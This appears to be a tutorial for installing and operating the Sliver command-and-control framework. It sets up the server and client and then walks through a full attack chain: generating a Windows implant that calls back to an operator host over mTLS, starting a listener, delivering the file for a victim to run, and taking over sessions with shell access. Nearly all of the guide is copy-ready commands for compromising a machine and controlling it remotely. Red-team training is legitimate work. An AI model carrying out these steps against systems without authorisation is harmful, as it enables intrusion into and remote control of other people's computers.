Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manages these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.
Documentation
Wiki: https://github.com/BishopFox/sliver/wiki/Getting-Started
GitHub: https://github.com/BishopFox/sliver/wiki
Features
- Dynamic code generation
- Compile-time obfuscation
- Multiplayer-mode
- Procedurally generated C2 over HTTP(S)
- DNS canary blue team detection
- Secure C2 over mTLS, HTTP(S), and DNS
- Fully scriptable
- Local and remote process injection
- Windows process migration
- Windows user token manipulation
- Anti-anti-anti-forensics
- Let’s Encrypt integration
- In-memory .NET assembly execution
Installation
Server
1. Download the server application
- wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip
2. Unzip the file
- unzip sliver-server_linux.zip
3. Install required libraries
- sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64
4. Run the application
- sudo ./sliver-server
5. Now we need to create a session for a player to connect, and display the player database
- new-player --operator vk9ops --lhost 192.168.0.21
- players
6. The .cfg file that was created will need to be installed on the client's host, so save it for later
- [*] Saved new client config to: /home/vry4n/Desktop/vk9ops_192.168.0.21.cfg
7. Start Multiplayer mode
- multiplayer
Client
1. Download the client application
- wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip
2. Unzip the application
- unzip sliver-client_linux.zip
3. Install the required libraries
- sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64
4. Try to run the application
- sudo ./sliver-client
5. Copy the vk9ops_192.168.0.21.cfg file from the server machine into /home/kali/.sliver-client/configs on the local machine
- sudo cp vk9ops_192.168.0.21.cfg /root/.sliver-client/configs
6. Try to run the application again
- sudo ./sliver-client
If you ever get a communication error, the source of the issue might be that “multiplayer” has not been enabled at the Sliver server console
How to use Sliver
1. See the help menu
- help
2. Display players’ database
- players
3. Create new player accounts; this can only be run from the Sliver server, not the client
- new-player --operator <username> --lhost <DNS or IP of the server>
4. Display Sliver version
- version
5. We need to generate an implant (mtls, http, dns); this will generate a file saved at the location specified
generate Generate a sliver binary
MTLS
- generate --mtls 192.168.0.21 --save ./file.exe --os Windows
6. Now, we need to start the listener
http Start an HTTP listener
https Start an HTTPS listener
dns Start a DNS listener
mtls Start an mTLS listener
- mtls
- jobs
7. Deliver the file, and wait for it to be executed by the user. Once executed, you will see a message on screen
8. Show all active sessions
- sessions -h
- sessions
9. To kill a session run
- sessions -k 1
10. Interact with a session
- sessions
- sessions -i 7
11. Run help to see all the available commands
- help
12. Run some commands to test what you can do
- whoami
- info
- shell